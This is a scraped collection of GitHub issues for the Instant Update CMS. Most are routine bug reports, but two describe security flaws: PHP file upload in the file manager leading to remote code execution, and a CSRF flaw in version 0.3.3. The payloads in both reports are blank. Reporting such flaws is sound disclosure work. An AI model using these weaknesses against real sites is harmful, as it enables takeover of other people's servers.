instantupdate / cms Goto Github PK

I've managed to get this to work with statically generated files from Jekyll, and it's awesome especially the inline editing stuff to boot.

You interested? I could do a pull request.

One thing that I have been bothered and trying to fix is all the index.php that keep appearing. Might have something to do with Jekyll being in a sub directory. I'll figure it out :-) Thanks for making this man!

Hi,

I've just came across this project and I was wondering whether a) it's still under active maintenance and b) what the long term plan might look like.

Do you have plans to update Codeigniter or move away from it?

Thank you!

Ok some of my comments have been over misconfiguration on my part, but here is a real issue I may have found.

When toggle edits, things are fine, edits are made. But when I go to stop editing, and toggle the editor off, nothing happens, and the debug console shows an error everytime I click it:

Uncaught The editor instance "my-editable-id" is already attached to the provided element.

So what now? How to fix this problem I wonder?

I enabled mod rewrite. I log in, click on live edit.

It takes me to index.php, I can edit. Great.

I navigate to another page on the site. Since I have rewriting enabled, it takes me to /pagename.html, and the editing controls are gone.

If I type index.php/pagename.html I can edit.

My html and template files are in the root directory, is this correct?

How to make it so I can navigate the site and live edit at the same time again?

Thanks,
David

For some reason, I'm not getting the sidebar with the edit controls. I followed all the documentation. Is there something I'm missing?

I found the module of manage files

So I try to upload a php type file, The content is “”

upload success
Access this file of test.php

Remote code execution

I hope your fix this issue,limit the upload file.

author：[email protected]

I have installed Instant Update 0.2.2 Instant Update 0.2.2 but installed.txt shows 0.2.1

and getting Fettle Error

on index.php/administration/users/edit/1 page

While in live edit mode, if you click logout, nothing happens.

So if you have rewriting enabled, and your site has any absolute links like this:
a href="/services/location.html"
and your at /services/location.html and you click the link, the link becomes
/services//services/location.html
How to fix this?

Tells me I have wrong username and password but I know its right. Debug console shows lots of errors, one of which is broken link to jquery ui. There is a get template directory php line before an external link in the auth_login php file.

After logging in and attempting inline edit, error appears in console

 Uncaught ReferenceError: IU_USER_PERMISSIONS is not defined
    at HTMLDocument.<anonymous> (?g=user-js:33)
    at l (jquery.js:2)
    at Object.fireWith [as resolveWith] (jquery.js:2)
    at Function.ready (jquery.js:2)
    at HTMLDocument.A (jquery.js:2)

Hey crew, theres a broken link here: auth_login.php

should be:

The install URL specified in the readme is dead :
http://my.instant-update.com/t/instant-update-installation/29

As soon as I plug my template into IU, no SVG's will load. I have to convert all SVG's to PNG's and load those if I want to use Instant Update.... Wuts up with that yo? How do we fix fixy!

The logout button while in live edit mode does not work for me. Is it just me?

Is there a way to make a user that can only edit certain pages???

Hi mates :)

with all php versions newer as vs. php 5.4 the iu-application/controllers/process.php at line 165, 166 generates the following errors:

A PHP Error was encountered
Severity: 8192
Message: Non-static method BrowserOS::get_os() should not be called statically, assuming $this from incompatible context
Filename: controllers/process.php
Line Number: 166

A PHP Error was encountered
Severity: 8192
Message: Non-static method BrowserOS::get_browser_no_version() should not be called statically, assuming $this from incompatible context
Filename: controllers/process.php
Line Number: 167

Hope You can solv it ;)

Kind regards from Germany and huge thanks for the awesome IU-CMS.

Andy

Hello! I just found your project and think it's very good!

I tried to register to the forums at http://my.instant-update.com/, however the confirmation email is never received.

I using gmail and wondering could your email server be blacklisted? (I recently had similar issue with another service)

• My email address is correct
• It's not in spam folder. (Or any other folder)
• Other email is received normally
• Waited, since yesterday
• Tried resending confirmation email a couple of times
• Similar issue with another unrelated service which was solved my changing email address to another that forwards to my gmail.

Maybe you should check that mails are sent normally? Mail configuration?

The gmail I was using is: e. . . . . . . . [email protected]

If you have an html comment, preceding a '<' with no space, it does not render the beginning '<' of the next element, so the html code is rendered as text. Example:

I have the following html:
<h1>Hello world</h1>
Every thing is fine. Now I have a comment preceding it:
<!--comment--><h1>Hello world</h1>
the browser renders this:
h1>Hello world</h1>
Loaded as static html, the browser renders it fine, so there is clearly an issue with there not being white space after a comment that makes the first character after a comment disappear. How can we fix this, as the agency I work for uses dreamweaver templates that force comments right before elements for library items.

First error:

A PHP Error was encountered

Severity: Warning

Message: Cannot modify header information - headers already sent by (output started at /var/www/web917/html/webcrew/iu-system/core/Exceptions.php:170)

Filename: core/Input.php

Line Number: 250

Next Error:

HP Error was encountered

Severity: 8192

Message: Non-static method BrowserOS::get_browser_no_version() should not be called statically, assuming $this from incompatible context

Filename: controllers/process.php

Line Number: 167

Last Error:

Severity: 8192
Message: Non-static method BrowserOS::get_os() should not be called statically, assuming $this from incompatible context

Filename: controllers/process.php

Line Number: 166

I hope You can fix it and find a solution for it. I`m using a shared hosting with php 5.6

Kind regards, Andy

I've noticed that some things like the mysql_escape_string has been deprecated from 5.3 and therefore causes errors.

I've made a patch if you want to peer review it. I think that part of making sure data injection is good could be improved on which I may do later today. I'll submit now.

I found the V0.3.3 has a CSRF vulnerability can operate on a web site.
When I set $config['csrf_protection'] = TRUE; in iu-application/config/config.php

For example add a user：
Payload:

result:

the csrf vulnerability in V0.3.3 can do anything,just like upload file,add user,mkdir,chang password and so on

Advise:
1, determine the current user identity through token or session.
2, sensitive operation needs to verify code, change password need to verify the old password. (unable to construct when constructing PoC. If you know your password, go directly to the background, why use CSRF)

I hope you can fix this vulnerability
author：[email protected]